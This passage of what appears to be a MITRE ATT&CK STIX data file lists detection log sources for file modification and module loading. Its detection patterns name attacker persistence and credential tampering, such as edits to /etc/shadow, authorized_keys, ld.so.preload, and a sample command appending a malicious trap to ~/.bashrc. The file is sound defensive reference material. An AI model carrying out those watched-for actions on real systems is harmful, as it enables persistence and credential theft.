                            "name": "linux:syslog",
                            "channel": "application or system execution logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "file permission modification events in kernel messages"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel messages related to file system permission changes and security violations"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_file_rename_t or es_event_file_write_t"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_authentication"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "code_signing, file_metadata"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "mach_o_info, file_metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "softwareupdated/homebrew/install logs, pkginstalld events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "AMFI or Gatekeeper signature/notarization failures for newly installed dev components"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Detection of altered _VBA_PROJECT or PerformanceCache streams"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem:syspolicyd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File metadata updated with UF_HIDDEN flag"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code signature validation fails or is absent post-binary modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code signing verification failures or bypassed trust decisions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of new LaunchAgent or LoginItem plist files in ~/Library/LaunchAgents/"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "filesystem events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr -d com.apple.quarantine or similar attribute removal commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Gatekeeper quarantine policy decision anomalies recorded in com.apple.LaunchServices.QuarantineEventsV2"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pkginstalld/softwareupdated/Homebrew install transactions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "AMFI/Gatekeeper code signature or notarization failures"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "kernel extension and system extension logs related to file system security violations or SIP bypass attempts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected application binary modifications or altered signing status"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "extended attribute write or modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "New certificate trust settings added by unexpected process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.lsd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "installer or system_installd 'PackageKit: install succeeded/failed' with non-notarized or unknown signer"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Gatekeeper/AMFI 'code signature invalid' / 'not notarized' messages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation or modification with com.apple.ResourceFork extended attribute"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "OS version query results inconsistent with expected or approved version list"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Observed File Transfers"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for file permission modifications"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for file permission, ownership, and attribute modifications with user context"
                        },
                        {
                            "name": "saas:RepoEvents",
                            "channel": "New file added or modified in PR targeting CI/CD or build config (e.g., `gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Invalid/Unsigned image when developer tool launches newly installed binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned or invalid image for newly installed/updated binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Code integrity violations in boot-start drivers or firmware"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "CodeIntegrity reports 'Invalid image hash' or 'Unsigned image' for new/updated binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "SmartScreen or ASR blocks on newly downloaded installer/updater"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4656, 4658"
                        },
                        {
                            "name": "WinEventLog:Setup",
                            "channel": "MSI/Product install, repair or update events"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=15"
                        },
                        {
                            "name": "WinEventLog:Windows Defender",
                            "channel": "Operational log"
                        },
                        {
                            "name": "WinEventLog:Windows Defender",
                            "channel": "Operational"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-16 16:41:53.549000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0061",
                            "external_id": "DC0061"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Modification",
                    "description": "Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples: \n\n- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\\Windows\\System32\\drivers\\etc\\hosts` on Windows.\n- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.\n- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.\n- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.\n- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write calls modifying ~/.bashrc, ~/.profile, or /etc/paths.d"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File modification in /etc/paths.d or user shell rc files"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/quarantine.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of ~/Library/LaunchAgents or /Library/LaunchDaemons plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "AUDIT_SYSCALL (open, write, rename, unlink)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_WRITE, targeting .zshrc, .zlogin, .zprofile"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/install.log"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=2"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call for modification of /etc/sudoers or writing to /var/db/sudo"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: File modifications under /etc/ssl/certs, /usr/local/share/ca-certificates, or /etc/pki/ca-trust/source/anchors"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: Enumeration of root certificates showing unexpected additions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, unlink, rename: Suspicious file access, deletion, or modification of sensitive paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Anomalous plist modifications or sensitive file overwrites by non-standard processes"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Modification or deletion of /etc/audit/audit.rules or /etc/audit/audit.conf"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write of .service unit files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write/unlink"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loginwindow or desktopservices modified settings or files"
                        },
                        {
                            "name": "ESXiLogs:messages",
                            "channel": "changes to /etc/motd or /etc/vmware/welcome"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write, rename"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "file change monitoring within /etc/cron.*, /tmp, or mounted volumes"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "manual edits to /etc/rc.local.d/local.sh or cron.d"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "/etc/passwd or /etc/group file write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "SecurityAgentPlugins modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write: File modifications to *.plist within LaunchAgents, LaunchDaemons, Application Support, or Preferences directories"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "boot"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of backgrounditems.btm or creation of LoginItems subdirectory in .app bundle"
                        },
                        {
                            "name": "fs:filesystem",
                            "channel": "Modification or creation of files matching 'com.apple.loginwindow.*.plist' in ~/Library/Preferences/ByHost"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write | PATH=/home/*/.ssh/authorized_keys"
                        },
                        {
                            "name": "macos:auth",
                            "channel": "~/.ssh/authorized_keys"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "compute.instances.setMetadata"
                        },
                        {
                            "name": "azure:resource",
                            "channel": "PATCH vm/authorized_keys"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "file write or edit"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "rename"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "file_write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of plist with apple.awt.UIElement set to TRUE"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "unlink, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: Write operations targeting /dev/sda, /dev/nvme0n1, or EFI partition mounts"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write: Modification of /boot/grub/*, /boot/efi/EFI/*, or initramfs images"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "config-change: timezone or ntp server configuration change after a time query command"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "replace existing dylibs"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes to boot variables, startup image paths, or checksum verification failures"
                        },
                        {
                            "name": "firmware:update",
                            "channel": "Unexpected or unscheduled firmware updates, image overwrites, or failed signature validation"
                        },
                        {
                            "name": "IntegrityCheck:ImageValidation",
                            "channel": "Checksum or hash mismatch between running image and known-good vendor-provided image"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "File modifications in ~/Library/Preferences/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write to /etc/pam.d/*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /Library/Security/SecurityAgentPlugins"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modifications to Mail.app plist files controlling message rules"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write: Modification of structured stored data by suspicious processes"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unexpected log entries or malformed SQL operations in databases"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected creation or modification of stored data files in protected directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat, write, rename, unlink"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file encrypted|new file with .encrypted extension|disk write burst"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "rename .vmdk to .*.locked|datastore write spike"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mach-O binary modified or LC_LOAD_DYLIB segment inserted"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write syscalls targeting /etc/ld.so.preload or binaries in /usr/bin"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modified application plist or binary replacement in /Applications"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "admin command usage"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "startup-config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation or overwrite in common web-hosting folders"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Unauthorized file modifications within datastore volumes via shell access or vCLI"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing 'crypto', 'key length', 'cipher', or downgrade of encryption settings"
                        },
                        {
                            "name": "FirmwareLogs:Update",
                            "channel": "Unexpected firmware or image updates modifying cryptographic modules"
                        },
                        {
                            "name": "fs:plist",
                            "channel": "/var/root/Library/Preferences/com.apple.loginwindow.plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "modification of existing .service file"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write or create events on *.pth, sitecustomize.py, usercustomize.py in site-packages or dist-packages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write of plist files in /Library/LaunchAgents or /Library/LaunchDaemons"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Unexpected modification to lsass.exe or cryptdll.dll"
                        },
                        {
                            "name": "networkconfig",
                            "channel": "unexpected OS image file upload or modification events"
                        },
                        {
                            "name": "network:runtime",
                            "channel": "checksum or runtime memory verification failures"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: Modification of /boot/grub/* or /boot/efi/*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /System/Library/CoreServices/boot.efi"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of LaunchAgents or LaunchDaemons plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "rename,chmod"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "create/write/rename under user-writable paths"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Changes to LSFileQuarantineEnabled field in Info.plist"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file access to /usr/lib/cron/tabs/ and cron output files"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "modification of crontab or local.sh entries"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration file modified or replaced on network device"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Plist modifications containing virtualization run configurations"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file access to /usr/lib/cron/at and job execution path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "binary modified or replaced"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "binary or module replacement event"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration change events referencing encryption, TLS/SSL, or IPSec settings"
                        },
                        {
                            "name": "networkdevice:firmware",
                            "channel": "Unexpected firmware update or image modification affecting crypto modules"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating permission, ownership, or extended attribute changes on critical paths. File system modification events with kFSEventStreamEventFlagItemChangeOwner, kFSEventStreamEventFlagItemXattrMod flags"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Modification of Display Manager configuration files (/etc/gdm3/*, /etc/lightdm/*)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /Library/Preferences/com.apple.loginwindow plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Modification of user shell profile or trap registration via echo/redirection (e.g., echo \"trap 'malicious_cmd' INT\" >> ~/.bashrc)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File write or append to .zshrc, .bash_profile, .zprofile, etc."
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, write, create, open"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Extensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: File writes to application binaries or libraries at runtime"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CALCULATE: Mismatch in file integrity of critical macOS applications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file write operations in /Library/WebServer/Documents"
                        },
                        {
                            "name": "fs:launchdaemons",
                            "channel": "file_modify"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write: File modifications to /etc/systemd/sleep.conf or related power configuration files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write: File modification to com.apple.PowerManagement.plist or related system preference files"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "modification of existing LaunchAgents plist"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create/modify dylib in monitored directories"
                        },
                        {
                            "name": "WinEventLog:CodeIntegrity",
                            "channel": "EventCode=3033"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write operation on /etc/passwd or /etc/shadow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "modification to /var/db/dslocal/nodes/Default/users/"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "New or modified kernel object files (.ko) within /lib/modules directory"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Modifications to /var/db/SystemPolicyConfiguration/KextPolicy or kext_policy table"
                        },
                        {
                            "name": "networkdevice:audit",
                            "channel": "SNMP configuration changes, such as enabling read/write access or modifying community strings"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mount or losetup commands creating hidden or encrypted FS"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Hidden volume attachment or modification events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious plist edits for volume mounting behavior"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes to startup image paths, boot loader parameters, or debug flags"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Checksum/hash mismatch between device OS image and baseline known-good version"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file writes"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "OfficeTelemetry or DLP"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Filesystem Access Logging"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing cryptographic hardware modules or disabling hardware acceleration"
                        },
                        {
                            "name": "FirmwareLogs:Update",
                            "channel": "Unexpected firmware updates that alter encryption libraries or disable hardware crypto modules"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Anomalous editing of invoice or payment document templates"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "truncate, unlink, write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification or replacement of /Library/Application Support/com.apple.TCC/TCC.db or ~/Library/Application Support/com.apple.TCC/TCC.db"
                        },
                        {
                            "name": "linux:fim",
                            "channel": "Changes to /etc/rc.local.d/local.sh or creation of unexpected startup files in persistent partitions (/etc/init.d, /store, /locker)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "write, rename"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write to /proc/*/mem or /proc/*/maps"
                        },
                        {
                            "name": "sysdig:file",
                            "channel": "evt.type=write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "rule definitions written to emond rule plists"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing older image versions or unexpected boot parameters"
                        },
                        {
                            "name": "FileIntegrity:ImageValidation",
                            "channel": "Hash/checksum mismatch against baseline vendor-provided OS image versions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write or rename to /etc/systemd/system or /etc/init.d"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file write to launchd plist paths"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "modification of entrypoint scripts or init containers"
                        },
                        {
                            "name": "fs:plist_monitoring",
                            "channel": "/Users/*/Library/Mail/V*/MailData/RulesActiveState.plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod/chown to /etc/passwd or /etc/shadow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write syscalls targeting web directory files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Terminal/Editor processes modifying web folder"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "AndroidLogs:FileSystem",
                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-01-29 17:21:27.873000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0016",
                            "external_id": "DC0016"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Module Load",
                    "description": "When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Module",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=7"
                        },
                        {
                            "name": "ETW:LoadImage",
                            "channel": "provider: ETW LoadImage events for images from user-writable/UNC paths"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat/read/mmap: Open/mmap .so files from non-standard paths"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "select: Open files path LIKE '/tmp/%.so' OR '/dev/shm/%.so'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dyld/unified log entries indicating image load from non-system paths"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "select: path LIKE '%/Library/%/*.dylib' OR '/tmp/*.dylib'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dynamic loading of sleep-related functions or sandbox detection libraries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "LD_PRELOAD Logging"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Dynamic Linking State"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DYLD event subsystem"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process linked with libcrypto.so making external connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events with dylib load activity"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=7"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "CLR Assembly creation, loading, or modification logs via MSSQL CLR integration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process memory maps new dylib (dylib_load event)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Dylib loaded from abnormal location"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=3033"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=3063"
                        },
                        {
                            "name": "auditd:MMAP",
                            "channel": "load: Loading of libzip.so, libz.so, or libbz2.so by processes not normally associated with archiving"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Loading of libz.dylib, libarchive.dylib by non-standard applications"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "suspicious dlopen/dlsym usage in non-development processes"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Non-standard Office startup component detected (e.g., unexpected DLL path)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mmap"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "unexpected module load"
                        },
                        {
                            "name": "snmp:status",
                            "channel": "Status change in cryptographic hardware modules (enabled -> disabled)"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "module load"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "delay/sleep library usage in user context"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kmod"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.kextd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loading of unexpected dylibs compared to historical baselines"
                        },
                        {
                            "name": "auditd:file-events",
                            "channel": "open of suspicious .so from non-standard paths"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "DYLD_INSERT_LIBRARIES anomalies"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "dmesg"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_KEXTLOAD"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "module load or memory map path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch and dylib load"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Processes linked with libssl/libcrypto performing network activity"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-ImageLoad",
                            "channel": "provider: Unsigned/user-writable image loads into msbuild.exe"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-02-23 18:45:08.713000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0035",
                            "external_id": "DC0035"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Access",
